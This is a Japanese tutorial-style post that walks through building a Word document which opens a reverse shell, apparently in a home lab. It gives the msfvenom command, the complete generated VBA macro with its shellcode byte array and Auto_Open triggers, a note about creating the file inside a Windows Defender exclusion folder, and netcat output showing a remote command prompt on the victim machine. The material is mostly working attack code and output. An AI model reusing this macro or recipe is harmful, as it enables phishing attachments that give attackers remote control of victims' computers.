Metasploitを使ってconnect-back shellを起動するWord文書を作ってみる
「電卓を起動するWord文書を作ってみる」では、簡単なVBAマクロを使って電卓を起動するWord文書を作成した。 VBAマクロではWin32 APIを呼ぶことができるため、任意のシェルコードを実行するマクロを書くことができる。 ここでは、Metasploit Frameworkを使ってconnect-back shellを起動するWord文書を作ってみる。
環境
Kali Linux 2.0、Metasploit Framework 4.11.4
root@vm-kali64:~# uname -a Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux root@vm-kali64:~# lsb_release -a No LSB modules are available. Distributor ID: Kali Description: Kali GNU/Linux 2.0 Release: 2.0 Codename: sana root@vm-kali64:~# msfconsole -v Framework Version: 4.11.4-2015071403
MetasploitでVBAマクロを生成してみる
Metasploitではシェルコードの出力形式としてVBAを選ぶことができ、これはそのままOfficeマクロとして使えるものになっている。
まず、msfvenomコマンドを使ってペイロード名や指定可能なオプションを調べてみる。
root@vm-kali64:~# msfvenom --help MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Options: -p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads --payload-options List the payload's standard options -l, --list [type] List a module type. Options are: payloads, encoders, nops, all -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -f, --format <format> Output format (use --help-formats for a list) --help-formats List available formats -e, --encoder <encoder> The encoder to use -a, --arch <arch> The architecture to use --platform <platform> The platform of the payload -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -b, --bad-chars <list> The list of characters to avoid example: '\x00\xff' -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -o, --out <path> Save the payload -v, --var-name <name> Specify a custom variable name to use for certain output formats --smallest Generate the smallest possible payload -h, --help Show this message root@vm-kali64:~# msfvenom -l Framework Payloads (432 total) ============================== Name Description ---- ----------- aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell aix/ppc/shell_find_port Spawn a shell on an established connection ... windows/shell_reverse_tcp Connect back to attacker and spawn a command shell ... root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options Options for payload/windows/shell_reverse_tcp: Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/shell_reverse_tcp Platform: Windows Arch: x86 Needs Admin: No Total size: 324 Rank: Normal Provided by: vlad902 <vlad902@gmail.com> sf <stephen_fewer@harmonysecurity.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to attacker and spawn a command shell Advanced options for payload/windows/shell_reverse_tcp: (snip)
上で調べた結果をもとに、192.168.56.4の4444番ポートにconnect-backするVBAマクロを生成すると次のようになる。
root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=4444 EXITFUNC=thread -f vba No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes #If Vba7 Then Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr #Else Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long #EndIf Sub Auto_Open() Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long #If Vba7 Then Dim Hhluw As LongPtr, Lgcpy As LongPtr #Else Dim Hhluw As Long, Lgcpy As Long #EndIf Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _ 139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _ 199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _ 139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _ 207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _ 1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _ 91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _ 0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _ 196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _ 15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _ 106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _ 104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _ 18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _ 80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _ 78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _ 189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _ 83,255,213) Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40) For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci) Ewtoup = Qkhfci(Kdhhfhp) Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1) Next Kdhhfhp Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub
上の結果のうち、#If Vba7 Then
以降が出力されたマクロとなる。
このマクロは、文書が開かれたタイミングで動作する。
具体的には、VirtualAlloc関数とRtlMoveMemory関数でメモリ上にシェルコードを配置し、CreateThread関数でこれを新たなスレッドで実行する。
ここで、デフォルトのEXITFUNC=process
ではシェルコードの最後にWordのプロセス自体を終了してしまうため、生成時にEXITFUNC=thread
を指定していることに注意する。
マクロが埋め込まれたWord文書を作ってみる
「電卓を起動するWord文書を作ってみる」と同様にして、上のマクロを含むWord文書を作成する。 なお、このファイルはWindows DefenderでTrojanDownloader:O97M/Donoff.gen!Aとして検知されるため、Windows Defenderの除外フォルダの中に作成する必要がある。
ncコマンドを使い192.168.56.4の4444番ポートで待ち受けた状態で、Word文書を開きマクロを有効にすると次のようになる。
root@vm-kali64:~# nc -v -l -p 4444 listening on [any] 4444 ... 192.168.56.1: inverse host lookup failed: Unknown host connect to [192.168.56.4] from (UNKNOWN) [192.168.56.1] 58116 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\user\Desktop>whoami whoami target-win8\user C:\Users\user\Desktop>^C
上の結果より、リモートからWord文書を開いた端末のコマンドプロンプトが操作できていることが確認できる。